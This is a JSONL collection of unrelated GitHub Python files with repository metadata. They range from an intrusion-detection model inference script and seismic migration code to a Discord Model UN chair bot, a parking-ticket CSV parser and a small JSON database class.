+{"seq_id":"25363969960","text":"import pickle\nimport numpy as np\nimport random\n\n\n# Load the trained model from the pickle file\nwith open(\"C:/Users/habibars/Downloads/Network monitoring/intrusion_detection/random_forest_model.pkl\", 'rb') as f:\n model = pickle.load(f)\n\n# Define the infer method\ndef infer(data):\n \n # Reshape the data to ensure it has the correct shape\n data = np.reshape(data, (1, -1))\n\n # Use the trained model to make a prediction on the input data\n prediction = model.predict(data)\n\n # Return the predicted class (e.g. \"BENIGN\" or \"Attack\")\n return prediction[0]\n\n\nif __name__ == '__main__':\n # Note: Only take input when you run the file individually \n # Generate a list of 69 random numbers between 0 and 1\n data = [random.uniform(0, 1) for _ in range(69)]\n\n prediction = infer(data)\n print(prediction)\n\n# Note: Command to run the file \"python inference.py\"\n\n\n","repo_name":"arsalanhabib01/Random-forest-model","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"20272784497","text":"import src.grpc.pb.message_pb2 as message_pb2\nfrom src.logic.handler import MessageHandler\nfrom src.logic.message_queue import MessageQueue\nfrom src.wit.wit import send_text\nimport src.grpc.pb.message_pb2_grpc as message_pb2_grpc\n\n\nclass MessageServicer(message_pb2_grpc.MessageServicer):\n\n def SingleRequest(self, request, context):\n wit_response = send_text(request.body)\n try:\n response = MessageHandler(wit_response, request.client_type).handle_message()\n except Exception as e:\n print(e)\n return message_pb2.Success(success=False)\n MessageQueue.add(response, request.client_type)\n return message_pb2.Success(success=True)\n\n def StreamRequest(self, request_iterator, context):\n while True:\n while MessageQueue.get_length() > 0:\n response, client_type = MessageQueue.get_first()\n yield message_pb2.MessageResponse(body=response.text, client_type=client_type)\n","repo_name":"nloetkemann/Lilly","sub_path":"Server/src/grpc/message_service.py","file_name":"message_service.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"37331005416","text":"books = [\"Learn You a Haskell\", \n \"The Healthy Programmer\",\n \"Code Complete\",\n \"The Pragmatic Programmer\",\n \"Pro Git\",\n \"Introduction to Algorithms\",\n \"Concrete Mathematics\"]\nindex = 0\n\nwhile index < len(books):\n\tprint(books[index])\n\tindex += 1","repo_name":"presian/HackBulgaria","sub_path":"Programming0-1/Week_2/2-List-Problems/while_traverse.py","file_name":"while_traverse.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"9863334712","text":"import numpy as np\nfrom wave_1d_fd_pml.propagators import Pml2\n\nclass Rtm(object):\n def __init__(self, dx, dt=None, pml_width=10, profile=None):\n self.dx = dx\n self.dt = dt\n self.pml_width = pml_width\n self.profile = profile\n\n def migrate_shot(self, model, source, source_x, receivers, receivers_x,\n imaging_condition_interval=1, ):\n assert source.ndim == 1\n assert receivers.ndim == 2\n source = source[np.newaxis, :]\n source_x = np.array([source_x])\n num_imaging_steps = int((receivers.shape[1] - 1) / imaging_condition_interval)\n\n prop = Pml2(model, self.dx, self.dt, self.pml_width, self.profile)\n nx = len(model)\n\n source_snapshots = self._forward_source(source, source_x,\n imaging_condition_interval,\n num_imaging_steps, prop, nx)\n\n image = self._backward_receivers(receivers, receivers_x,\n imaging_condition_interval,\n num_imaging_steps,\n source_snapshots, prop, nx)\n\n return image\n\n def _forward_source(self, source, source_x,\n imaging_condition_interval,\n num_imaging_steps, prop, nx):\n\n source_snapshots = np.zeros([num_imaging_steps, nx], np.float32)\n for imaging_step in range(0, num_imaging_steps):\n start_time_step = imaging_step * imaging_condition_interval\n end_time_step = start_time_step + imaging_condition_interval\n if end_time_step < source.shape[1]:\n source_snapshots[imaging_step, :] = \\\n prop.step(imaging_condition_interval,\n source[:, start_time_step:end_time_step],\n source_x)\n elif start_time_step < source.shape[1]:\n remaining_source_steps = source.shape[1] - start_time_step\n steps_after_source = (imaging_condition_interval -\n remaining_source_steps)\n prop.step(remaining_source_steps,\n source[:, start_time_step:],\n source_x)\n source_snapshots[imaging_step, :] = \\\n prop.step(steps_after_source)\n else:\n source_snapshots[imaging_step, :] = \\\n prop.step(imaging_condition_interval)\n\n return source_snapshots\n\n def _backward_receivers(self, receivers, receivers_x,\n imaging_condition_interval,\n num_imaging_steps,\n source_snapshots, prop, nx):\n\n image = np.zeros([nx], np.float32)\n for imaging_step in range(num_imaging_steps - 1, -1, -1):\n start_time_step = (imaging_step + 2) * imaging_condition_interval - 1\n end_time_step = start_time_step - imaging_condition_interval\n if start_time_step >= receivers.shape[1]:\n start_time_step = receivers.shape[1] - 1\n receiver_snapshot = \\\n prop.step(start_time_step - end_time_step,\n receivers[:, start_time_step:end_time_step:-1],\n receivers_x)\n image += (source_snapshots[imaging_step, :] *\n receiver_snapshot[:] * imaging_condition_interval)\n\n return image\n\n def model_shot(self, model, source, source_x, receivers_x, max_time):\n assert source.ndim == 1\n source = source[np.newaxis, :]\n source_x = np.array([source_x])\n num_receivers = len(receivers_x)\n\n prop = Pml2(model, self.dx, self.dt, self.pml_width, self.profile)\n\n nt = int(max_time / self.dt)\n receivers = np.zeros([num_receivers, nt], np.float32)\n for step in range(nt):\n wavefield = prop.step(1,\n source[:, step:step+1],\n source_x)\n receivers[:, step] = wavefield[receivers_x]\n\n return receivers\n","repo_name":"ar4/rtm_1d","sub_path":"rtm_1d/rtm.py","file_name":"rtm.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"40052292714","text":"import sys\nimport datetime\nimport pandas as pd\nfrom scipy import stats\n\ndef calc_zscore(df, name):\n try:\n zscore = stats.zscore(df.ix[:, 1])\n df[5] = zscore\n except TypeError:\n print(\"TypeError: \" + name)\n return df\n\ndef add_zcore(filename):\n try:\n df = pd.read_table(filename, header=None)\n scored_df = calc_zscore(df, filename)\n scored_df.to_csv(filename, header=None, index=None, sep=\"\\t\")\n except pd.parser.CParserError:\n print(\"ParseError: \" + filename)\n\ndef main(args):\n try:\n yyyymmdd = args.pop(1)\n if yyyymmdd == \"today\":\n yyyymmdd = datetime.date.today().strftime('%Y%m%d')\n except IndexError:\n d = datetime.date.today() - datetime.timedelta(days=1)\n yyyymmdd = d.strftime('%Y%m%d')\n\n filename = \"/home/fluent/.fluent/log/hotnews_\" + yyyymmdd + \".txt\"\n add_zcore(filename)\n\nif __name__ == '__main__':\n argsmin = 0\n version = (3, 0)\n if sys.version_info > (version):\n if len(sys.argv) > argsmin:\n sys.exit(main(sys.argv))\n else:\n print(\"This program needs at least %(argsmin)s arguments\" %\n locals())\n else:\n print(\"This program requires python > %(version)s\" % locals())\n","repo_name":"id774/hotnews","sub_path":"zscore_daily.py","file_name":"zscore_daily.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"20594812551","text":"# https://leetcode.com/problems/roman-to-integer/\n# Input: s = \"MCMXCIV\"\n# Output: 1994\n# Explanation: M = 1000, CM = 900, XC = 90 and IV = 4.\n\n# Symbol Value\n# I 1\n# V 5\n# X 10\n# L 50\n# C 100\n# D 500\n# M 1000\nimport roman as roman\n\n\nclass Solution:\n\n\n def romanToInt(self, s: str) -> int:\n rule_add = {\n 'I': 1,\n 'V': 5,\n 'X': 10,\n 'L': 50,\n 'C': 100,\n 'D': 500,\n 'M': 1000\n }\n\n rule_div = {\n ('I', 'V'): 3,\n ('I', 'X'): 8,\n ('X', 'L'): 30,\n ('X', 'C'): 80,\n ('C', 'D'): 300,\n ('C', 'M'): 800\n }\n number = 0\n prev_l = None\n for l in s:\n if prev_l and rule_add[l] > rule_add[prev_l]:\n number += rule_div[(prev_l, l)]\n print(number)\n else:\n number += rule_add[l]\n print(number)\n prev_l = l\n return number\n\n\n if __name__ == '__main__':\n s = 'MCMXCIV'\n f = romanToInt('self', s)\n\n","repo_name":"yention/codewar","sub_path":"leetcode/RomanToInt.py","file_name":"RomanToInt.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"349791859","text":"import json\n\n# entire database class with all the functions\nclass MyDb:\n def __init__(self, dbName):\n self.fileName = dbName + \".json\"\n self.json = self.loadDatabase()\n self.collection = \"\"\n def loadDatabase(self):\n with open(self.fileName) as file:\n return json.load(file)\n\n def saveDatabase(self):\n with open(self.fileName, \"w\") as file:\n file.write(json.dumps(self.json, indent=4)) \n\n def changeCollection(self, nameOfCol):\n try:\n self.json[nameOfCol]\n except KeyError:\n print(\"This collection is not in database, preparing collection.\")\n self.json[nameOfCol] = []\n \n self.collection = nameOfCol\n def getAll(self):\n return self.json[self.collection]\n def find(self, query):\n key = list(query.keys())[0]\n for obj in self.json[self.collection]:\n if obj[key] == query[key]:\n return obj\n\n def create(self, obj):\n highestId = 0\n for user in self.json[self.collection]:\n if user[\"id\"] >= highestId:\n highestId = user[\"id\"] \n highestId += 1\n obj[\"id\"] = highestId\n self.json[self.collection].append(obj)\n self.saveDatabase()\n return obj\n \n def delete(self, query):\n key = list(query.keys())[0]\n for obj in self.json[self.collection]:\n if obj[key] == query[key]:\n self.json[self.collection].remove(obj)\n self.saveDatabase()\n return True \n return False\n\n def update(self, query, updateObj):\n queryKey = list(query.keys())[0]\n updateKey = list(updateObj.keys())[0]\n for obj in self.json[self.collection]:\n if obj[queryKey] == query[queryKey]:\n obj[updateKey] == updateObj[updateKey]\n self.saveDatabase()\n return obj \n return False\n\ndef main():\n db = MyDb(\"users\")\n db.changeCollection(\"prizemi\")\n name = input(\"Name: \")\n print(db.getAll())\n user = db.create({\"name\": name})\n print(db.getAll())\n\nif __name__ == '__main__':\n main() \n","repo_name":"HollowFalls/retirement-product","sub_path":"myPyDb.py","file_name":"myPyDb.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"10773477298","text":"import os\nimport subprocess\nimport tempfile\nfrom pprint import pformat\nfrom src.cpp_builder import CPPBuilder, compile_cpp_module\n\n\ndef get_test_stdout(root_node, compile_only=False):\n source_path = tempfile.mktemp(dir=\"/tmp\", prefix=\"drake_test\", suffix=\".cpp\")\n header_path = source_path.replace('.cpp', '.hpp')\n exe_path = source_path.replace('.cpp', '')\n\n with CPPBuilder(c=source_path, h=header_path) as builder:\n root_node.to_cpp(builder)\n\n print(\"\\nCPP header file:\\n\", open(header_path).read())\n print(\"\\nCPP source file:\\n\", open(source_path).read())\n\n compile_cpp_module([ source_path ], exe_path)\n\n if compile_only:\n return None\n\n output = subprocess.check_output(exe_path)\n output = output.decode('utf-8').strip()\n\n return output\n","repo_name":"programWhiz/drake","sub_path":"tests/test_hl_ast/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"2746996203","text":"# main.py\nfrom collections import namedtuple\nfrom datetime import datetime\nfrom functools import partial\nfrom collections import defaultdict\n\n\nfile_name = './nyc_parking_tickets_extract.csv'\n\nwith open(file_name) as f:\n column_headers = next(f).strip('\\n').split(',')\n sample_data = next(f).strip('\\n').split(',')\n\nprint(column_headers)\nprint(sample_data)\n\ncolumn_names = [header.replace(' ','_').lower() for header in column_headers]\nprint(column_names)\nprint(list(zip(column_names, sample_data)))\nTicket = namedtuple('Ticket',column_names)\n\n# with open(file_name) as f:\n# next(f)\n# raw_data_row = next(f)\n#\n#\n# print([raw_data_row])\ndef read_data():\n with open(file_name) as f:\n next(f)\n yield from f\nraw_data = read_data()\n\ndef parse_int(value, *, default=None):\n try:\n return int(value)\n except ValueError:\n return default\n\n\n# print(parse_int('test', default='not an interger'))\n#\n# print(parse_int(10, default='not an integer'))\n\ndef parse_date(value, *, default=None):\n date_format = '%m/%d/%Y'\n try:\n return datetime.strptime(value, date_format).date()\n except ValueError:\n return default\n\n\n# print(parse_int('hello', default='N/A'))\n# print(parse_date('3/28/2018'))\n# print(parse_date('231212', default='N/A'))\n\ndef parse_string(value, *, default=None):\n try:\n cleaned = value.strip()\n if not cleaned:\n return default\n else:\n return cleaned\n except ValueError:\n return default\n\n\n# print(parse_string(' helllo '))\n# print(parse_string(' ', default='N/A'))\n\ncolumn_parsers = (parse_int,\n parse_string,\n lambda x: parse_string(x, default=''),\n partial(parse_string, default=''),\n parse_date,\n parse_int,\n partial(parse_string, default=''),\n parse_string,\n lambda x: parse_string(x, default='')\n )\n\n\ndef parse_row(row, *, default=None):\n fields = row.strip('\\n').split(',')\n parsed_data = [func(field)\n for func, field in zip(column_parsers, fields)]\n # return parsed_data\n if all(item is not None for item in parsed_data):\n return Ticket(*parsed_data)\n else:\n return default\nrows = read_data()\n\n\nprint('-------')\nfor _ in range(5):\n row = next(rows)\n parsed_data = parse_row(row)\n print(parsed_data)\n\n\nfor row in read_data():\n parsed_row = parse_row(row)\n if parsed_row is None:\n print(list(zip(column_names, row.strip('\\n').split(','))), end='\\n\\n')\n\n\ndef parsed_data():\n for row in read_data():\n parsed = parse_row(row)\n if parsed:\n yield parsed\nparsed_rows = parsed_data()\n\n\n# for _ in range(5):\n# print(next(parsed_rows))\n\n\ndef violation_count_by_make():\n makes_counts = defaultdict(int)\n for data in parsed_data():\n makes_counts[data.vehicle_make] += 1\n\n return {make: cnt\n for make, cnt in sorted(makes_counts.items(),\n key=lambda t: t[1],\n reverse=True)}\n\n\nprint(violation_count_by_make())","repo_name":"elmi-elmi/dD-pr6-demo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"6106144375","text":"import discord\r\nimport time\r\nimport asyncio\r\nfrom discord import FFmpegPCMAudio\r\nfrom collections import defaultdict\r\nfrom discord.ext import commands, tasks\r\nfrom discord.utils import get\r\nfrom youtube_dl import YoutubeDL\r\nclass Chair(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.session={}\r\n self.delegate=self.bot.get_cog('Delegate')\r\n self.general_speakers={}\r\n self.player={}\r\n self.register = defaultdict(dict)\r\n \r\n @commands.has_role('Chair')\r\n @commands.command(brief='Starts a session.', description='Enables all commands for a session and invites bot to voice channel.')\r\n async def startSession(self, ctx):\r\n self.session[ctx.guild.id]=True\r\n if self.delegate is not None:\r\n self.delegate.session[ctx.guild.id]=True\r\n self.delegate.general_speakers[ctx.guild.id]=[]\r\n else:\r\n t=[]\r\n self.general_speakers[ctx.guild.id]=t\r\n self.register[ctx.guild.id]={}\r\n connected = ctx.author.voice\r\n if connected:\r\n voice_client = get(ctx.bot.voice_clients, guild=ctx.guild)\r\n if voice_client and voice_client.is_connected():\r\n embedVar = discord.Embed(title=\"Error\", description=\"Bot is already in VC. Please disconnect bot from VC and try again.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.channel.send(embed=embedVar)\r\n \r\n else:\r\n await connected.channel.connect() \r\n await ctx.channel.send(\"Session has started!\")\r\n else:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Please join a voice channel.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.send(embed=embedVar)\r\n @startSession.error\r\n async def startSession_error(c,ctx, error):\r\n if isinstance(error, commands.MissingRole):\r\n embedVar = discord.Embed(title=\"Error\", description=\"The 'Chair' role is required to run this command.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.send(embed=embedVar)\r\n @commands.has_role('Chair')\r\n @commands.command(brief='Ends the current Session.', description='Disables session commands and disconnects bot from voice channel.\\n Clears GS list.')\r\n async def endSession(self, ctx):\r\n self.session[ctx.guild.id]=False\r\n if self.delegate is not None:\r\n self.delegate.session[ctx.guild.id]=False\r\n self.delegate.general_speakers[ctx.guild.id]=[]\r\n \r\n connected = ctx.author.voice\r\n if connected:\r\n server=ctx.message.guild.voice_client\r\n await server.disconnect()\r\n await ctx.channel.send(\"Session has ended!\")\r\n \r\n @commands.has_role('Chair') \r\n @commands.command(brief='View the general speakers list.', description='Prints out the current general speakers list.')\r\n async def GS(self, ctx):\r\n if self.session[ctx.guild.id]==True:\r\n embedVar = discord.Embed(title=\"General Speakers List\", description=\"General Speakers.\", color=discord.Color.from_rgb(78,134,219))\r\n t=''\r\n if self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]==[]:\r\n embedVar = discord.Embed(title=\"General Speakers List\", description=\"This list is empty.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.channel.send(embed=embedVar)\r\n else:\r\n for country in self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]:\r\n t=t+country+'\\n'\r\n embedVar.add_field(name=\"Countries:\", value=t, inline=False)\r\n \r\n await ctx.channel.send(embed=embedVar)\r\n \r\n @commands.has_role('Chair') \r\n @commands.command(brief='Removes first delegate from general speakers list.', description='Remove first delegate from general speakers list.\\n Used just after a speaker has finished.')\r\n async def popGS(self, ctx):\r\n if self.session[ctx.guild.id]==True:\r\n if self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]==[]:\r\n embedVar = discord.Embed(title=\"Error\", description=\"List is empty.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.channel.send(embed=embedVar) \r\n else:\r\n t=self.bot.get_cog('Delegate').general_speakers[ctx.guild.id][0]\r\n self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]=self.bot.get_cog('Delegate').general_speakers[ctx.guild.id][1:]\r\n self.general_speakers[ctx.guild.id]=self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]\r\n \r\n await ctx.channel.send(str(t)+' was removed from the GS list.')\r\n \r\n\r\n\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Yields the floor to a delegate.', description='Needs [delegate name] [time in seconds] and starts a timer.')\r\n async def speak(self,ctx, *,args):\r\n \r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n u=str(args[0])\r\n try:\r\n t=int(args[1])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n return\r\n except IndexError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Not enough arguments. Please provide Delegate and Time.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n return\r\n await ctx.send(u+\" has the floor!\")\r\n def check(message):\r\n return message.channel == ctx.channel and message.author == ctx.author and message.content.lower() == \"cancel\"\r\n try:\r\n m = await self.bot.wait_for(\"message\", check=check, timeout=(t-10))\r\n await ctx.send(\"Cancelled\")\r\n except asyncio.TimeoutError:\r\n await ctx.send(\"10 seconds left, \"+u)\r\n try:\r\n m = await self.bot.wait_for(\"message\", check=check, timeout=(10))\r\n await ctx.send(\"Cancelled\")\r\n except asyncio.TimeoutError:\r\n await ctx.send(\"Time is up, \"+u+'!')\r\n \r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Proposes a caucus.', description='requires [type].\\n If type is mod, structure is !propose mod [total time in min] [speakers time in sec] [country proposed] [topic].\\n If other type, requires [type] [total time in min] [country proposed].')\r\n async def propose(self, ctx,*,args):\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n type=args[0]\r\n if type=='mod':\r\n try:\r\n total=int(args[1])\r\n speaking=int(args[2])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n country=args[3]\r\n topic=' '.join(word for word in args[4:])\r\n embedVar = discord.Embed(title=\"Proposal\", description=\"A motion has been proposed.\", color=discord.Color.from_rgb(78,134,219))\r\n \r\n embedVar.add_field(name=\"Proposed Caucus:\", value=type, inline=False)\r\n embedVar.add_field(name=\"Topic:\", value=topic, inline=False)\r\n embedVar.add_field(name=\"Country:\", value=country, inline=False)\r\n embedVar.add_field(name=\"Speaking Time (seconds):\", value=int(speaking), inline=False)\r\n embedVar.add_field(name=\"Total Time (minutes):\", value=int(total), inline=False)\r\n m= await ctx.channel.send(embed=embedVar)\r\n await m.add_reaction(\"\\U0001F44D\")\r\n await m.add_reaction(\"\\U0001F44E\")\r\n else:\r\n try:\r\n total=int(args[1])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n country=args[2]\r\n embedVar = discord.Embed(title=\"Proposal\", description=\"A motion has been proposed.\", color=discord.Color.from_rgb(78,134,219))\r\n embedVar.add_field(name=\"Proposed Caucus:\", value=type, inline=False)\r\n embedVar.add_field(name=\"Country:\", value=country, inline=False)\r\n embedVar.add_field(name=\"Total Time (minutes):\", value=int(total), inline=False)\r\n m= await ctx.channel.send(embed=embedVar)\r\n await m.add_reaction(\"\\U0001F44D\")\r\n await m.add_reaction(\"\\U0001F44E\")\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Starts a moderated caucus.', description='Requires !mod [total time in min].\\n Starts a timer.')\r\n async def mod(self,ctx, *,args):\r\n url='https://www.youtube.com/watch?v=SK3g6f5jsRA'\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n try:\r\n t=int(args[0])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n return\r\n await ctx.send(\"The Mod has started!\")\r\n def check(message):\r\n return message.channel == ctx.channel and message.author == ctx.author and message.content.lower() == \"cancel\"\r\n try:\r\n m = await self.bot.wait_for(\"message\", check=check, timeout=t*60)\r\n await ctx.send(\"mod cancelled\")\r\n except asyncio.TimeoutError:\r\n await ctx.send(f\"Mod is over!\")\r\n \r\n voice_client=ctx.guild.voice_client\r\n YDL_OPTIONS = {\r\n 'format': 'bestaudio',\r\n 'postprocessors': [{\r\n 'key': 'FFmpegExtractAudio',\r\n 'preferredcodec': 'mp3',\r\n 'preferredquality': '192',\r\n }],\r\n 'outtmpl': 'song.%(ext)s',\r\n }\r\n with YoutubeDL(YDL_OPTIONS) as ydl:\r\n ydl.download([url])\r\n voice_client.play(FFmpegPCMAudio(\"song.mp3\"))\r\n voice_client.is_playing()\r\n \r\n \r\n \r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Starts a unmoderated caucus.', description='Requires !unmod [total time in min].\\n Starts a timer.')\r\n async def unmod(self,ctx, *,args):\r\n url='https://www.youtube.com/watch?v=SK3g6f5jsRA'\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n try:\r\n t=int(args[0])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n return\r\n await ctx.send(\"The UnMod has started!\")\r\n def check(message):\r\n return message.channel == ctx.channel and message.author == ctx.author and message.content.lower() == \"cancel\"\r\n try:\r\n m = await self.bot.wait_for(\"message\", check=check, timeout=t*60)\r\n await ctx.send(\"Unmod cancelled\")\r\n except asyncio.TimeoutError:\r\n await ctx.send(f\"UnMod is over!\")\r\n voice_client=ctx.guild.voice_client\r\n YDL_OPTIONS = {\r\n 'format': 'bestaudio',\r\n 'postprocessors': [{\r\n 'key': 'FFmpegExtractAudio',\r\n 'preferredcodec': 'mp3',\r\n 'preferredquality': '192',\r\n }],\r\n 'outtmpl': 'song.%(ext)s',\r\n }\r\n with YoutubeDL(YDL_OPTIONS) as ydl:\r\n ydl.download([url])\r\n voice_client.play(FFmpegPCMAudio(\"song.mp3\"))\r\n voice_client.is_playing()\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Register a delegate.', description='Requires !register [delegate name] [status].\\n Status can be present (p),present and voting(pv) or absent (a)')\r\n async def register(self,ctx,*,args):\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n member=args[0].lower()\r\n status= args[1]\r\n dic=self.register[ctx.guild.id]\r\n dic[member]=status\r\n if status=='p':\r\n await ctx.send(member.title()+\" is present!\")\r\n if status=='pv':\r\n await ctx.send(member.title()+\" is present and voting!\")\r\n if status=='a':\r\n await ctx.send(member.title()+\" is absent!\")\r\n elif status not in ['p','pv','a']:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Not a valid registration status. Use p, pv or a.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='View the register.', description='Displays all registered delegations and their statuses.')\r\n async def viewRegister(self,ctx):\r\n if self.session[ctx.guild.id]==True:\r\n dic=self.register[ctx.guild.id]\r\n embedVar = discord.Embed(title=\"Register\", description=\"All registered delegates.\", color=discord.Color.from_rgb(78,134,219))\r\n for k,v in dic.items():\r\n t=''\r\n if v=='p':\r\n t='Present'\r\n if v=='pv':\r\n t='Present and Voting'\r\n if v=='a':\r\n t='Absent'\r\n embedVar.add_field(name=k, value=t, inline=False)\r\n\r\n await ctx.channel.send(embed=embedVar)\r\n \r\n \r\n \r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Start a vote.', description='Starts a non-caucus vote. Useful for final vote or amendments.\\n Requires !voting [topic]')\r\n async def voting(self, ctx,*,args):\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n topic=' '.join(word for word in args)\r\n embedVar = discord.Embed(title=\"Voting\", description=\"A vote is in progress.\", color=discord.Color.from_rgb(78,134,219))\r\n embedVar.add_field(name=\"Topic:\", value=topic, inline=False)\r\n\r\n m= await ctx.channel.send(embed=embedVar)\r\n await m.add_reaction(\"\\U0001F44D\")\r\n await m.add_reaction(\"\\U0001F44E\")\r\n \r\n\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Give Chair role.', description='Gives chair role to another member.\\n Requires !chair [@member]')\r\n async def chair(self, ctx,user: discord.Member):\r\n \r\n member = user\r\n role = get(ctx.message.guild.roles, name=\"Chair\")\r\n await member.add_roles(role)\r\n embedVar = discord.Embed(title=\"Chair Role\", description=\"Role was given to \"+str(member), color=discord.Color.from_rgb(78,134,219))\r\n \r\n\r\n m= await ctx.channel.send(embed=embedVar)\r\n \r\n \r\n \r\n\r\n \r\n \r\ndef setup(bot):\r\n bot.add_cog(Chair(bot))\r\n","repo_name":"aditepic10/MUNchkinDiscordBot","sub_path":"cogs/Chair.py","file_name":"Chair.py","file_ext":"py","file_size_in_byte":16476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"}
+{"seq_id":"18206609032","text":"class Solution:\n def findMaxConsecutiveOnes(self, nums: List[int]) -> int:\n ans = 0\n zeros = 0\n\n l = 0\n for r, num in enumerate(nums):\n if num == 0:\n zeros += 1\n while zeros == 2:\n if nums[l] == 0:\n zeros -= 1\n l += 1\n ans = max(ans, r - l + 1)\n\n return ans\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0487. Max Consecutive Ones II/0487.py","file_name":"0487.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"}
+{"seq_id":"37312293595","text":"import requests\n\nTOKEN = None\n\n\ndef api_init(token):\n global TOKEN\n TOKEN = token\n\n\ndef api_url(path):\n return f'https://sisu.unit4.io/api{path}'\n\n\ndef request_headers(custom_headers):\n return {\n **custom_headers,\n 'Authorization': 'Bearer %s' % TOKEN,\n }\n\n\n# def request_post(url, data):\n# body = json.dumps(data).encode('utf-8')\n# headers = request_headers({\n# 'Content-Type': 'application/json',\n# })\n# req = urllib2.Request(url, headers=headers, data=body)\n# return request_send(req)\n\n\ndef request_put(url, data):\n print(f'> Req {url}')\n headers = request_headers({\n 'Content-Type': 'application/json',\n })\n\n try:\n res = requests.put(url, json=data, headers=headers)\n print(res.status_code)\n\n return res.json()\n except Exception as e:\n print(e)\n\n return None\n\n\n# def request_get(url):\n# headers = request_headers({})\n# req = urllib2.Request(url, headers=headers)\n# return request_send(req)\n\n\ndef api_set_project_file_tests(project_id, file_id, tests):\n url = api_url(f'/projects/{project_id}/file/{file_id}/tests')\n return request_put(url, tests)\n\n\ndef api_project_update_file(project_id, filename, log_list):\n log = '\\n'.join(log_list)\n data = {\n 'filename': filename,\n 'log': log,\n 'lastScanTs': 1,\n 'previewImageUrl': '',\n }\n\n res = request_put(api_url('/projects/%s/file' % project_id), data)\n\n print(filename)\n print(res)\n print(log)\n\n\ndef api_get_file_metadata(file_id):\n url = api_url(f'/data/files/{file_id}/metadata?token={TOKEN}')\n\n try:\n res = requests.get(url)\n if res.status_code == 404:\n return None\n\n return res.json()\n except Exception as e:\n print(e)\n return None\n\n\ndef api_get_file_content(file_id):\n url = api_url(f'/data/files/{file_id}/content?token={TOKEN}')\n\n try:\n res = requests.get(url)\n if res.status_code == 404:\n return None\n\n return res.content\n except Exception as e:\n print(e)\n return None\n","repo_name":"tmshv/sisu","sub_path":"sisu-worker/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
